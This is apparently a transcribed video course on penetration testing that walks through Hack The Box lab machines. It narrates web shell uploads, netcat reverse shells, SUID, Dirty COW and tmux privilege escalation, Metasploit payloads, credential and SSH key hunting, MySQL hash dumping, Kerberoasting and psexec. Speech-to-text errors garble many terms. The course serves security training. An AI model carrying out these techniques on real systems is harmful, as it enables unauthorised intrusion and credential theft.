in, and then we go W exclamation point to overwrite it, and now it's overwritten. But the problem is I'm not able to get out of here, so we have to just go ahead and close that, and we have to make a new tab. We have to set up a new Netcat listener and reconnect. And actually I think this is over here. I'm just going to copy this so I don't have to retype it in. Paste, enter, and now we should be able to cat the Etsy pass WD. Here's our new user. It just saved as T because root didn't get all the way in there. So we can just switch users to T, and then we'll type in the password that we made, and we are now root. So that is a kind of difficult way to get the Etsy pass WD file overwritten. For some reason, no matter what I did, I was unable to write that the correct way into the pass WD file, and I had to come over and make my own, copy it, paste it in, and it always deleted the first few characters of root. And this time we luckily had just the T left over. But that is one way to go ahead and overwrite the Etsy pass WD file. So I hope you were able to get this on your own. If not, you can go ahead and try it again, because you're surely going to see this again in the future. Okay, we are back, and we're going to be doing a box from Hack2Box. It is called Bank, and so you can go ahead and connect to Hack2Box and launch the box, and so you can connect and you can begin with your Nmap scan. But before we do, I want to challenge you guys to go ahead and try this box on your own. We've covered everything necessary to gain a foothold, and I just want to give you a tip. It's going to be a little more enumeration than what you might think when you first try to do your enumeration on this web server here. But before you go ahead and begin this box, there's one thing that I want to cover. Sometimes when you're doing Hack2Box machines, because we're working in a virtual environment, they label their web servers, not always, but sometimes, with a .htb. Normally, if you're out in the real world, you're going to come across .com, .net, .org, .gov, things like that. But because they have linked their web server to .htb, we're going to have to add that to our Etsy host file. And just a heads up, sometimes when you come out and you do boxes on your own and you're trying to work through Hack2Box on your own, when you come to a web page and you type in the IP address, normally when you need to add it to your Etsy host file is when it doesn't render. So usually it won't render anything. In this case, it's a little more tricky because the page actually does render. But what we'll have to do to go through and do this, we'll type in sudo gedit Etsy hosts, and you'll hit enter right here. And so we'll enter this, and we can type in our password. Okay, and here we are. And what you'll do is you'll type in 10.10.10.29 bank.htb, and you will save this. One thing to remember is when we have port 53 open is to go ahead and enumerate it. We actually did not cover the way to enumerate it that works on this box, because we used, I believe, NS lookup and DNS recon. But what actually works on this box is a dig AXRF and then bank.htb, and then we enter at 10.10.10.29. And so when you run this, I'll actually go ahead and run it. To remember to add this into your notes.
It's another way to enumerate port 53 and look for additional pages for us to add to our Etsy host file in this case, or to go out and look at. So if you wanted to be really thorough in your editing your Etsy host, you would go in and you would add bank.htb, chris.bank.htb, and you would even add this ns.bank.htb, and you just go through and add all of these. In this case, bank.htb will get us everything we need, but I thought I'd go ahead and show this to you so that you would be ready in the future and you wouldn't be caught off guard when you see it. So I want to go ahead and give you the challenge to try and solve this box on your own. We've covered the privilege escalation, we've covered the foothold already in this course, so I'll go ahead, and if you want, you can pause the video now and give this a try, or you can continue along with the video and do follow along. So we'll go ahead and we'll go bank.htb, and this brings us to a web page. And what you can do here is you can go ahead and try SQL injection. You can launch SQL map, which is something you can't use. Really, you shouldn't use it in a real world pen test. You definitely cannot use it on a bug bounty, and you're not allowed to use it in a lot of certifications. So we're not going to mess with it at this point. But what we're going to do is we're going to go ahead and start our GoBuster. And because we see this .php, what we're going to do is we're going to go with our GoBuster. And so we'll come over here, we'll just open up a new tab, we'll type GoBuster dash dir dash, we don't do a dash dir, we go dir dash u e slash slash, and we're going to type in bank.htb. Rather than the IP address, we're going to go with our word list. And this is where I think it gets a little tricky, because you will have to use a different word list than what we've been using. You can go out and grab seclist. Word list, that's the one I usually use when I'm trying to find directories. But in this case, I have one that I've actually modified. So we'll go ahead and go, I think it's going to be home, and then Kali, desktop, it's in tools, and I called it just wordlist.txt. So we'll go ahead and run that, and it's going to start pulling down directories for us and pages for us to go ahead and look at right away. We can go try and see what these render. Let's go ahead and see where this takes us. And we get this login page, which doesn't really look like it's going to do us any good. This is also at the bank login. Let's go ahead and delete this and see if we get anything different. And we hit this forbidden page. One thing I have not tried, but I am curious now that we see this forbidden page, is to run this and to intercept this forward, put in a 200, okay, and see what happens. Okay, still tells us the same thing. So we'll come in here, we'll come back, and this right here looks interesting, so we'll go ahead and check this out. Bank transfer, that sounds like something you don't want someone to be able to see. That does not work. So what we'll do is maybe we do need to go over here and edit our Etsy host file. I thought we could get away without adding these in, so we'll go ahead and add this, paste, and we can add this, paste, and we'll go ahead and add this one, and we'll paste, and we'll save that, and we will try and come back here to this, and we will type in slash balance transfer. Okay, so we do need those in there. Now it brings us to this page with all of these files. And so what we can do is, I have come to pages before similar to this, not quite this extensive, but pretty extensive. And I went through and looked at every single one of these before I was able to find the vulnerability, but in our case, when we look at this, we can just see these are all pretty similar in size, and so they're going to be, what I would do is I would just look at one that's got a 583, a 584, and a 585, because it's probably going to be pretty much all the exact same files. And if you do look at one of those, it just turns out to be something that's encrypted, and here's one that is different. And so what we'll do is we'll go ahead and click on this. We will click Save File, and it will save to our downloads. So what we can do is CD over to our downloads, and then we'll cat this file out and see what is inside of it. And what we end up with is an email and a password. So remember that login page that we started at? We can try that. SSH is also open, and whenever I find credentials, that's probably where I'm going to go first, is I'm going to try and SSH into the box, and that is not going to work. So then we'll go back to our login page, and what we will do is just copy this, paste it in. We will copy this, and we will paste it in. We will submit. We will not save. So when we come to a web page, the first thing we automatically do is we start clicking around. That doesn't do us any good. And you click to see if you can do anything. This would be terrible if you found this in real life for whoever you're testing. And then we come over to support, and then we're brought to this page, and it has a file upload. And whenever you see file upload, you can automatically just start trying to upload different files. You can try documents, you can try PNGs. For us, we would want to try a PHP, especially since it's running PHP, to see if we can get a reverse shell. So what we'll do is we can come in here, we can upload a file. So we can go ahead and try this, and we will want to turn on our interceptor, and we will type in test, we'll choose the file, we'll go ahead and submit. We go forward, oh, I just forwarded past it. Okay, it says it was a success, so that's a good thing. We can come in here and we'll just type in file this time, and we'll go file, we'll choose our file, we'll pick our GIF, we will turn intercept back on and hit submit, and we are brought to this page. We're going to send it to repeater, and we'll go ahead and send that on its way. And since we already know this works, we can send this and see the response. We can render the response. You can look over here, and it says it was a success, so we can come back over here, and if you look through here, we will see what it tells us. We have this comment here that actually tells us what we need to do next. So this is something you're probably not going to see in real life, but it's something that they've gone ahead and done on a Hack the Box. Is it says I added the file extension HTTP to execute as PHP. So what happens is if we change to this, what we'd want to do if we're trying to upload a reverse shell is we would change this to PHP. But in this case, it says PHP is blocked, but we can use .htb. And so the next thing we need to do is if you just try to upload a PHP shell, and I'm telling you this just to save time, it's not going to work, but we need to trick the server into thinking that we are uploading a PHP shell, and I have a gigantic GIF here that is going to take a second for me to highlight and then delete. So I'll just bring you back once this is deleted. Okay, now that we have that all deleted, the reason we kept this right here is because it'll tell the server that we're uploading an image, and that's what we need to do in order to bypass the filter. And so you can actually just go out to Google and just type in pretty much anything .gif and then go to image and just download a GIF so that you can do this. Or you can make a file and you can just make this the beginning of the file and save it and then upload that instead of doing what I just did and deleting all of that mumbo jumbo. But we'll go ahead, since we've already deleted it and this file's already here, so we'll call this htb.htb. So that way it will execute as PHP, and we have seen this before. We'll come up here and we're gonna go tell that okay, and we're gonna go web shells.
we're going to grab this web shell that we have used in the past. That is not what I needed. I need this. I need this, and we're going to come over here, and we are literally just going to paste that in, and then I'm going to change the name to file1, so that way we have it, and we'll send it. It tells us that went through. So now what we need to do is, we'll actually just refresh this page, and we'll resend it. Okay. We have file 1. This is the one we used. We'll click on it. It takes us to the page. And if you remember how web shells work, we just type in $CMD for the command, which was the variable we decided to use, and then a command, who am I, and this should execute we are www data. Since we have command execution on this box, we can go ahead and delete that. We will grab a reverse shell from a reverse shell cheat sheet. I actually tried to run a Python shell, so I typed in which Python, sent it. It says we have Python. I still could not get the Python shell to run. I also tried bash, and I couldn't get that to work. So what I did is I went and I tried Python and I tried bash. I skipped PHP and I decided to go straight for netcat. So this was actually the third one that I tried. And we'll go back over here and we'll just type this in. And what I am going to do is I'm just going to leave this as 1, 2, 3, 4 because I don't really want to have to delete it. 10.14.15. If you remember how this works, we will need a netcat listener. So we'll just go netcat lvnp 1, 2, 3, 4, or whatever port you decided to roll with. We will send that. And it did not hang, so something didn't work. Okay, I wasn't listening. We'll send it again. And let's check our shell. It says it connected. So if we go ID or who am I, it says we are connected to this box. So now what I like to do is I like to have a full interactive shell. So you can go ahead and type in Python because we already checked which Python, -C. And I don't know if we've seen this before, but it just gets us this little prompt right here. So we can go import -p, don't need a dash, pty.spawn, and then we come here, /bin/bash, and then close this off. And we now have this right here. But for editing purposes later on in the video, because we're going to have to edit some files, if you just try to edit a file exactly how this is, it doesn't work. You have a mess and it is really quite difficult. You can get around it by importing files, and I can show you guys how to do that later, but I'm going to go ahead and if you hit Command Z, actually I'll just show you. So we ls, if I try to type in GIF and I hit tab, nothing works, and it makes it really difficult to edit files inside some boxes. So we're going to go ahead and hit Command Z. We're going to type in stty raw-echo, and then we'll have this little colon here, and then the FG just brings us back into the box. So you can hit enter, and then you have to hit enter again. And now if we type in GIF and we hit tab, it works, and it also makes it so we can edit files. So I want you to go ahead and see if you can figure out the privilege escalation on this video on your own. So go ahead and see if you can pull over linpeas and run it and find the vulnerability. Okay, how did that go? I'm gonna go ahead and cancel this. We're gonna go ahead and CD over to desktop tools. We're going to need a simple server. And now we have this launched, we can grab linpeas onto our box. So we can go ahead and go wget, and then we can type in our IP address, and then we're going to type in linpeas.sh, and that should grab. We can bash linpeas and we'll run that. All right, instead of reading through this linpeas file here, you're going to see that this box is actually vulnerable to several different vulnerabilities that we have in fact covered, so you can go ahead and do those on your own. but we are just coming out of the SUID privilege escalation, and I want to cover that. So this doesn't actually pick up on the SUID vulnerability. And so what we're going to have to do is we're going to come all the way down here to our command prompt. We're going to go to our payloads, all the things. We're going to copy this and paste this in. The reason I want to cover this is because I told you that these are not always that obvious. So LinPiece doesn't even pick it up because it doesn't recognize this. And also we are going to see one that isn't how you would cover it here in the GTFO bins. So this one is a little bit different than what we have seen already. And honestly, every SUID I have come across is not common. Like, they're all different and they all require some Googling. And so when I originally did this with the SUID is I copied this and I typed in cat and then I pasted it in, and we can go ahead and do that. It just gives us back a bunch of unlegible stuff. And so I didn't know exactly what this was doing. So I ended up coming in here and I just tried to execute this file. And if you look and we go, who am I? We are now root. And so SUIDs are a bit tricky. They're not always straightforward. And this one is no exception. It is not how you would expect it to be. And so that is the SUID vulnerability in this box. You can change the password to the etc passwd file, and I would challenge you to go ahead and do that. It is a little tricky on this box, so it may take a few tries. And with that, I will see you in the next video. All right, there is one way of privilege escalation that I want to show you guys that you will see in the future, one that you'll need to know, and that is through MySQL. So we actually have MySQL here. One thing to always check is your history. So when you come onto a box, you can type in history, and we actually see we have MySQL, some localhost, user, password, 123. So what you can do is type it in this way. So we just use MySQL -root, and we are here in the MySQL database. And so what we'll do is go show databases, and you can save these in your notes just pretty much just like this. And then we'll use MySQL, or we'll use whatever database seems interesting. And then we can show tables. Forgot my semicolon there. So if you hit this arrow, it's because you need a semicolon to close off your SQL query. And then you can look through here and you can go through all these files and see what looks interesting to you. This looks interesting, the databases, but we're going to go into the users probably 90% of the time or more. You're going to want to go into the users, and so you can actually come in here and we'll just select all, and some of this should look familiar from the SQL injection. So select all from user, and this actually gives us a very non-pretty version of the user and the password. There's another way to do this. We can go select, and then we'll go user, because remember we're looking for the user inside the table, which we actually have MySQL here. So we're going to be inside this user. So we're going to go select user, and then inside the user, I'll show you actually. It looks like this. Describe the user. So inside the user column, we want to find the user and the password. So what we're going to end up typing in is select the user and the password, and it's going to be from the table user. And then when we close that off and we hit enter, it makes it look a whole lot prettier. So sometimes you'll come in here and you'll have users and there'll be plain text passwords, but most of the time you're going to have something like this, and you're going to have to try and crack this password. But this is helpful. You're going to need to know it. You're going to come across it in the future. So remember that you can just type it in this way and you can have the very non-pretty version, or you can go about it and grab the passwords this way. I'd go ahead and save those SQL commands because you're going to need them in the future. unless you know SQL really well, or you are up for the challenge of Googling in the future, or I guess you don't have to save them and you can just refer to this video. Either way, you're going to need to know that MySQL is something you need to look through in the future, and it's something you should always be ready to check. And I'll see you in the next video. Alright, in this video we're going to be going over some password hunting within Linux. This is something that some of the tools will cover for us, but it's always best to try and do it manually, especially if you get stuck at a dead end. And what we are going to do here is where it payloads all the things. What you'll do is you'll just come over here and you can copy these and you can just paste them straight into the box that you have a shell on, and you'll go ahead and paste it in, hit enter, and see if any files come back that look interesting. And we can go ahead, like some of these I'm pretty sure are actually available on this specific box. So what you'll do is you'll come over here, you just hit enter, and there they are, and you can actually, since these are just files, you can copy these and you can look and see what's inside of them. We are going to continue with this. These passwords, password hunting isn't the only thing you want to hunt for. This right here, these SSH keys, is definitely something that you need to be aware of. You will come across these in the future, but sometimes you're going to go like that, you'll paste it in and nothing's going to come back, and it's because the key is not actually named ID RSA. Most often that's what it's going to be called, but in this specific case it is actually called root underscore key. Yep, and there it is. And so we can actually go into where this file is, and we can cd /.ssh, and then the file should be right here. And what we'll do is we'll go chmod, and then we type in root key, and boy, I'm really struggling. Chmod, and then we need 600 so that we can use this key. And it says changing permissions of the key is not permitted. And we can go ahead and see if this will actually work anyway. We can go ssh-i root key, and then we'll go root at, and then we put in whatever IP address we're trying to SSH to. And in this case, it's 182.85. And we can go ahead and hit enter, and it says, do you want to fingerprint the box? We say yes, and we are root. Most of the time, you are going to have to chmod 600 this. I'm not sure why that didn't work in this case, but that is how you would go about finding an ID RSA key and SSHing into the box. And you'll also want to remember and put in your notes or in your workflow password hunting. So with that, I will see you in the next video. Okay, we are going to be talking about SUIDs, or the set UID. These are going to be something you're going to see, but they're not as straightforward as you might hope. Every single SUID I have ever come across has taken me more time than I think it should, because when you think about it and you go to GTFO bins, they look really easy, but every single time, every payload I've ever had to deal with has required some kind of modification or wasn't as straightforward as I had hoped. So these are something you're going to see in the future. So if you come over to payloads, all the things, the SUID is right here, and it tells us it stands for set user ID. So the way we find these, linps and linenum both will find these, but you can also just come in here and you can copy, you can paste, and you just press enter and it will pull them down for us. So when you do this, it's going to look like this is what we're looking for, this S right here. We're looking for the sticky bit, and the sticky bit will be right here, and this is for the root user. So the root user has read-write access, and then the S is enabled. So when we see something like a chmod 777 and then file here. What's happening is they're changing this to read, write, execute all the way across for the root user, the group users, and the local user. So it would be a 7 here. This would be 4 bits. So if you saw something like this, 477, it would be, or a 444. What you'd be enabling is the read access, and then this would be the 2 bits, which is the write access, and you would see something like a 6. So like when we see the chmod 600, and then when you see all 7s, it would be read, write, execute all the way across. And so this is what we're looking for right here, this S. And then if it was a G UID, this would be a G, and this would be a T. But really what we're looking for right now is just the SUID. So we're looking for this one right here for this sticky bit. And what we'll do when you come across these, the way you enumerate these, linps is the best because it's going to just highlight it. It'll just highlight if one is vulnerable. But you might have to come across manual enumeration at some point, and linps isn't going to find it. So what you do when you enumerate these is eventually you'll get used to just seeing them and you'll know what's there. But you come over to GTFO bins, you will go to SUID, you will click on this, and then what you do is you just look for, you can go straight down and you go CHSH, and you can come down here and you can just look for CHSH, and then you can go, okay, that's not in here. We can look for sudo. I know sudo, plain sudo is not in here. I think sudo might be in here with an extension. Nope, see? So I still have to come here and look through these, and you will probably too. So we can go through and you can look for these, and then when you find one and you click on it, it will tell you how to carry out the execution for getting the file you need or to get root access. That is the SUID. We're going to go ahead and jump into a box that has an SUID in it, and you can go ahead and try and do the foothold on your own, and we can work on the privilege escalation together, or you can just follow along through the whole thing. I will see you in the next video.
All right. I know that in this course we are not focusing a lot on Metasploit. However, I do think that it's helpful to know. And so we're back here at the Devel machine, however you want to say it, from Hack the Box. And this is where we created our payload. And so one of the things you're going to notice that's different is instead of using the shell _ reverse TCP, we're going to go ahead and use Meterpreter reverse TCP. We're going to do the same thing with our port, our L host, which is our local host, our machine here that we're running on. We're going to run it as ASPX, and basically everything else is the same. So we'll go ahead and have that generate. And in the meantime, we'll go ahead and open up MSF console, and that is going to open up Metasploit for us. And we're going to go ahead and FTP 10.10.10.5. And it's anonymous. We're going to go binary, put shell, and make sure that it's in there. And now that that's on there, we know we can execute it. But we need to have our handler. So if you remember, we need to be listening. We have been using netcat to listen. But in this case, we're going to go ahead and we're going to use, I think it's multi-handler. Maybe it's exploit multi-handler. And then we will go and options, and we're going to set our L host, set L host on 0, and go options, and see our L host is now set. I actually made a mistake. So one of the things we're going to do is we have to have our payload match what we created over here. So we're going to have to copy this. We're going to go to set payload, and then we're going to paste this in. We're going to go options, and we have that going now. Now we click run, and we're going to fire this off again.
and it has received the connection. And we're going to go ahead, instead of going into the shell and enumerating, we're going to go ahead and go straight to the privilege escalation. And we're going to go and we're going to background this session. It says it's backgrounding as session 10. And now we are going to run, we're going to run the post. Actually, we have to run this from our session. So we have to go, I think it's sessions dash I10. Okay. It's been a while since I've ran some of these commands, so sorry about that. I wasn't too sure. We're going to go ahead, and from here, we are going to run the post multi-recon local exploit suggester, and this should go ahead and pull the information it needs. It's going to turn out similar exploits to those as we saw from the Windows exploit suggester. So we'll go ahead and wait for this to bring back some of the exploits for us. Okay, for me, it actually failed, and I'm not really sure why. So I ran it again, and now we have our exploits here. So what I would recommend is the same thing I did earlier, and I would say start from the top and go down, or start from the bottom and go up, unless you know which one is going to work. And in our case, it's going to be this one right here. So the way we would use this is to copy it. We're going to background our session. And now we're going to use this exploit. We're going to go options. We're going to set the session to 10. And just in case you're wondering, I'm literally just going to go straight through here and set up what needs to be set. So we'll go and we will set lhost to ton 0, and then we'll go options and make sure that it is set. We're actually going to switch the port, and we'll go set L port, and this time we'll just use 2222, and we'll go options, and that looks like it should run. So we'll go ahead and run it, and we will see what happens. And now if we go into shell, drop into a shell, and we can say, who am I? And we are authority system. See, you can see why people like Metasploit. It's so much easier. It's got everything we need right here. We don't have to go through and search for a bunch of tools. We have the tools loaded for us already. We have the exploits loaded for us, and it's really simple. And I would say use it whenever you can. I know there are some certifications that don't want you to use Metasploit, but then there are some that don't really care. So with that, I would always say exploit with Metasploit if you have the opportunity first, and then go back and try and do it manually to figure out how exactly it's working. So that is this box with the kernel exploit manually, and then also with Metasploit. I'll see you in the next video.
All right, we are going to be going through a Linux kernel exploit. So this is on the box Valentine, and I think it's helpful to see one on Windows and then one on Linux. And so you can go ahead and follow along if you want to open up the box Valentine and go through this, or you can just watch and see how the kernel exploit works on a Linux box. They're pretty similar, and so with that, I thought it would be a good idea to group them together. Okay, we are ready for our privilege escalation. There are a couple of different ways you can escalate with root privileges on this box, and now that I'm thinking about it, I'm hoping that no one else has done these because it can kind of mess things up, and I did not revert the box. So if you haven't started yet, or you just want to risk it, you can go ahead and start without reverting the box like we're about to do. We've gone ahead and SSH'd in, we are on the machine, and we're going to start out with the easy one. So we'll go ahead and we're going to run linps, which you have saw in the privilege escalation portion of the course. And so what we're going to do is come over to, I keep everything in my tools directory, and you can go ahead and wherever you have it, you can go ahead and head over to that location. We will need to host it up with a
simple HTTP server. And this just makes it so whenever we make a wget, we can get the folder or the file that is within this folder. And now that is up and going. There's two places I like to get folders to whenever I'm on a machine. I either will use their downloads or their temp folder. And because we're already in the hype directory, we'll just go ahead and cd into the downloads. And I don't think there's going to be anything in here. And so we'll run a wget, and we'll go ahead and type in my IP, which I believe is 1415. And it works, so we'll go ahead and run that and see what it pulls down. Now, right away, this gets pulled down, our version. Our version gets pulled down for the kernel. So what we'll do is you can copy this. I would just grab this whole thing, the OS version. I'd copy this and I'd go over to Google and paste it in, and you can read and see what this is vulnerable to. And we're gonna go ahead and run an exploit. I've already done that to see what this is vulnerable to. And we're gonna do that one second. The first and easiest is when you come across here, you see this tmonk session is running as root, and if you're familiar with tmonks, you're familiar with this command right here. So the first way to grab this is really simple. So if you had never done this before and I had never done this before and I saw this, I would probably just Google and paste this. I'd just paste this straight into Google. Maybe look at this right here and paste it into Google and read and see if there's anything I can do with it, because it is highlighted. But because we know how to use this, you can go ahead and copy this to hijack this tmonk session that's owned by root. We'll go ahead and cancel that, and you can literally just paste this in and hit enter, and you are root, and so you have root privileges. And so we can go ahead and exit that. That's one way to get root privileges. The other way is through, let me check what I got here. Okay, the other way is through the dirty cow exploit. So if you remember, we were just talking about the OS version. If you go out and Google this version, you'll find that it's vulnerable to the dirty cow exploit. So we can come over to Google. If you type in dirty cow exploit GitHub, you can go ahead, click the first one, and we see that it's got pretty good reviews. You can read through the code if you can understand C, check to see what's in here and how it runs. I'm going to go ahead and run it. I've run this before. I've run it on other boxes. So what we're going to do is we're going to copy the link location. We are going to check to make sure the box has GCC. It says that there is no input files. So this box has GCC on it, so it can compile the exploit for us. Sometimes they won't have GCC, and you'll have to do it on your actual Kali machine and then pull over the executable file onto the vulnerable server. But because we have GCC here, we're going to go ahead and run this wget on the location we just copied. And then it tells us what to do. It's going to make a default user, and to compile it, we run this script right here. Once it gets done, actually, now that I'm remembering, this machine actually won't run a wget off of this GitHub page. So we have to run the wget, since I copied something else, to our Kali machine, paste, and then we need to run our simple server again, and then we run our wget off of our own box. Oops, 14, 15, I think it saves as dirty.c. And it says that it grabbed it. So we can go ahead and close out of that. Now we can go ahead and GCC this. And if you ls, you should see we have the executable here. And then it tells you this is how to run it. You can either go like this and it'll have no password, or you can run it dirty with some password. So what I'm going to do is I'm going to opt for the second. I'm going to go /dirty, and then I'll just type in, we'll hit enter, it'll ask for a password, we'll type in pass, and it says that it's been added. I don't know why, but mine always seems to hang there. And then if we switch users to Firefart, the new user, and we type in pass, then we can see that it has made a new user with root privileges. That is the second way to solve this box. What I would recommend is waiting a few days and coming back and trying to do this again once it's not quite as fresh in your memory, so that way you can get used to going through the steps of researching, pulling over tools, and compiling the exploits. All right, I'll see you in the next video.
All right, we are going to be starting the Active Directory portion of this course. I have gone back and forth on how exactly to go about teaching this and what is the most helpful way. Originally, I was going to go through and show you each one of the tools you need to know in the beginning to start enumerating Active Directory and getting code execution on an Active Directory network. And then I decided, well, it might not be the most beneficial way just to show a bunch of tools and then walk through some boxes. So I think what we're going to do is there's 3 different boxes that require Active Directory knowledge to get remote code execution on the network. From there to go ahead and get system. So I want to just go through 3 different boxes step by step. I'm going to break out all of the videos so that in the future when you are on an Active Directory machine, you can come back and reference this course and you can click on the specific portion that's relevant to the box you're working on. And so if this portion of the course could be done better, you can go ahead and leave a comment in the bottom of the video, and maybe I can reshoot this portion with each individual tool being used, or maybe there's some tool you really want to know about or you've read about somewhere that you think would be helpful and beneficial to others, and I can go ahead and add that to this course. So with that, we're going to go ahead and we're going to begin walking through one of these 3 boxes so that you can begin to understand how Active Directory works and see these tools in action. And with that, I will see you in the next video. Okay, we are back and we're going to continue on with the box active. I'm going to show you 2 different tools from Impacket. First, we'll just come over here and this is what it looks like. It's Impacket get NP users, and then it's the domain controller, the IP. So we give it the IP, we give it the name, which is active.htb. A lot of times you're going to see in Hack the Box this as HTB, but elsewhere you're going to see this as the username.local. We're actually going to see one later that has a .local. And then the username, and let's pretend we found a username but we don't have a password. And so what we would do is we would try and go -no-pass and see if we could get a TGT from this service. And so unfortunately we're going to run it, but we're not able to get a TGT. But we are going to see this again. We're going to try this again in another box in the future, and I don't actually remember if it works or not. So we will try it out and see if we can get this TGT. If you get a ticket back, you can do a pass the ticket attack. And the tickets last usually, I think it's 10 hours default by Windows. So you can use that ticket. I also see that I got this IP wrong. You can use that ticket and see what you're able to have access to. And we're going to go ahead and we're going to show another Impacket tool. So it will look like this, Impacket -get, and I think that it is users. Yes, it's this one. See, here's a box that was done as spooky.local. That one I think is from Try Hack Me if I'm remembering right. Now we'll go ahead and type in our active.hvc/svc-tgs. We can delete this, and then we'll go ahead and we'll paste in our password here so that we can
get this hash. So as you can see, in packet, we're going to use in packet here once, we're going to use it again twice, and then we're going to use it a third time to actually get our shell on this box. So it's really important for us to use in packet and to know how to use it and to make sure you have it. I told you before earlier in this course that if any penetration tester is told they can have one tool, this is usually the tool they're going to go after. So for some reason, this doesn't seem to want to run. All right, so the problem turned out to be I had a dash right here and it needed to be an underscore. So now that we got that resolved, what we can see is we now have the name administrator here that it has spit down for us, and it did not give us the hash, so we're going to go ahead and run this again. It says that the clock skew is too great. Okay, so this is my box clock, my Kali Linux box right here. The time does not match the time on the Kerberos Windows machine right here, so you can see the difference. So this error, you are going to get this every single time you ever run this. Every single time I've run this, it always tells me the clocks don't match. I think you have to be within an hour, and I don't remember how to fix this, so you just paste it in here, and there's going to be a simple way to update this clock in one of these up here. So we'll go ahead and paste that in, and it's going to tell us how to fix this. It's because our time is not linked, and the mitigation for it. This is what we're looking for. Maybe it'll be in this GitHub page. I will go ahead and find this and bring you back once I have the mitigation for this. It turns out what you end up having to do is type in sudo apt install ntp date. Go ahead and run it. It will install, and then in order to link up your time, you just type in sudo ntp date and then the IP address, and you hit enter, and that will go ahead and update the time. And then you'll go back over to the Active Directory box that we're working on, and you'll go ahead and run this command, and you will get this output. And so we have the administrator name here, and this is their ticket. So we'll go ahead and copy that, and we'll cd into desktop, HTB, and then we'll go into active, and then we're going to name this gedit hash.txt, and we will paste in the hash, and we can save it, and we're going to use hashcat to crack this. We'll type in cat, and we'll hashcat, and then we can go ahead and copy this, paste it in here, and we're told we need to use 131 100, and so that will be the hashcat type we're going to use. So we'll go ahead and type in hashcat-m 13100 hash.txt -a, and we're going to use the word list rocku. So we'll go ahead and locate rocku.txt. We will copy this, and now we can go hashcat all over again -m 13100, and then we'll go hash, and then we'll paste in the directions to our word list, and we'll see if that runs. This will take a minute, so I will bring you back once hashcat is finished running. Alright, hashcat it has finished running, and here is the password for this hash. You can go ahead and copy this, and we'll go gedit notes, and we can type in I think the user was administrator, so we can come up here, and it's on a different link, but it's administrator, And then this is the password, and we're going to go ahead and log into that in the next video. But what we just did is called curb roasting. So we had the ticket granting service, and it reached out to the domain controller, and we were able to pull down the administrator with their hash. And with that, we were able to crack it and grab this password. And so in the next video, because there is no WinRM on this box, we're going to go and get a shell on this Active Directory network in a different way. And with that, I'll see you there. All right, we are back with our final video on the box active, and this is going to be using psexec to get a shell on the network. So what we're going to do is check our credentials we found in the last time, which are right here, administrator, and this is the password, Ticketmaster 1968. So what we can do before we test the psexec is you can always come in here and you can use SMB map, just like we did here, and we'll check and see what shares we have. And so we'll paste in our password, and then we can put in the username, administrator, and we can see what shares we have. And if we have the ability to write to all the shares, read write, right here, if you can read write to this admin, that's the one you need to know. If you can read write to that, you can psexec into the box, because WinRM is down, so we're going to have to use psexec, which will use port 139 and 445. So if you go back and check the nmap scan, you will be able to see what I'm talking about. And the way we psexec is using impacket again. So this is the third time we've used impacket. So we can type in impacket and then dash psexec. And then we type in active.htb, which is the domain that we're going to be going into. And then we type in administrator as the user we're going to be using at 10, 10, 10, 100, and then we paste in our password, and you're going to see that it is writing to admin. This is why we checked to see if we had read write to admin, and if we do, we get a shell back. And so we can go, who am I? And we are NT authority system. So that is the box active, and this is how you use psexec. You will need to know this in the future. You will need to know how to write this syntax, so you can go ahead and save this into your notes. You will for sure see it regularly in the future. You will need to be able to psexec into Windows boxes once you have credentials. So with that, we will begin the next box on Active Directory in the next video. All right, we're going to be starting with the box active from Hack the Box. And so I went ahead and ran this nmap scan. The IP address is 10.10.10.100. I ran it with a T5 because I didn't want to wait, and it wasn't pinging. So I went ahead and did the dash capital PN. And we have the nmap scan here. Now this is what a normal looking Active Directory nmap scan is going to look like. Sometimes you'll have a port 80 open, or you'll have a web server. Sometimes you won't, and when you don't, you can just look at this and you can just think, okay, here's what I need to do is I'm going to start, if it were me, I'm going to start right here, 139, 445, then I would go to 398, then I would hop down to 464. So this is just kind of my method that I would be working through this, if this is how I'd go about it. So what we are going to start off with is looking at this port 445, and we'll come over here and we can actually just type in SMB map, and it will look just like this. You've seen this before. What we're doing is looking to see if we have any file shares that we have access to with anonymous login. So we can go ahead and run that and see what it pulls down. And it says we have access read only to replication. So you've seen this also before. So we run this SMB map, and then we can also run SMB client, and then it's // 10.10.10.100, and then we can run this / replication, and then we can do a -c, and then we can type in recurse ls. And so what this is going to do is it's going to go through and it's going to run through
all of the files, and it's going to list them out for us. And this is helpful if you don't mind having your terminal full of stuff. But I like doing this because the other way to go about doing this is to actually log in to the SMB server anonymously and then going through and manually looking at everything. That just takes a lot of time, and it's a lot of typing, and it's a lot quicker to just use that command we just saw. But if you wanted to go ahead and do it the manual way, what you would do is just type in SMB client, and then we can type all this in, and we'll just delete this, and then we hit enter, and it should load us with a command prompt. And then you would just have to go in here and you can ls, I don't remember, yeah, dir works too. And then you would just see this little D right here means it's a directory. So you would go ahead and then you would cd into active.htb, and then you would go ahead and look at the files again, and then you would choose whatever folder you wanted to go into, and so on and so forth, and it just really takes forever. So it's a lot quicker to do it this way. When this loads for us, we can start all the way at the top, and we can look and see, okay, if we cd'd into active.htb, this is what you're going to see. And then the way SMB client works is it just is going to go through and list for us each one of these files. It's going to cd into the next one, and then it's going to list it, cd into the next one, and it's going to list it. And so if it were my first time going through here, I would remember these. They could be useful, and then I would just keep on scrolling. But because I would definitely look at users if I was first time on this box, see if I could pull down some users, because if you have a user, you can try and pull down hashes, which we're actually going to see a little bit later with some in-packet tools. So if you can get a user, you might be able to get lucky enough to pull down a user with a password or a password hash that we can crack, and we are actually going to see this. So that is helpful that it has users listed there. If you were on a CTF or some kind of certification, it's possible that they would just throw this user here, and then they would give you just a whole list of users just to lead you down a rabbit trail. So you got to be careful of doing something like that. So we have the registry policy, we have groups, and at this point, this is something that's interesting because if you have this groups.xml and you have it inside the policies, this actually is going to have for us the information we need. And so in order to grab this file, because we're already logged in right here on this SMB server, we can go ahead and just copy this entire thing and save us some time. And we can go ahead and cd to this location. And I don't really want to get this at this specific spot. So what I'll just show you what we're going to do is you would go ls and you'd see this, and then you can type in get and then groups.xml. And I'm actually going to move over to a different folder and grab this because it's going to be grabbing right here in my Linux box, and I don't really want it there. But that's how you'd go ahead and get this folder. So I'm going to pause the video, and I'm going to switch locations, and then we'll go ahead and get this file and look and see what's inside. Okay, so we're going to grab this file. We can close out of here, and then we can go ahead and ls, and then we can cat this out, and we can see what is in here. And so we see we have a password. It is hashed, and we're going to go ahead and crack this in the next video. And then we have a user somewhere around here. Right here we have svctgs as a user. We'll go ahead and pause this here, and we'll go ahead and crack this in the next video. We have this 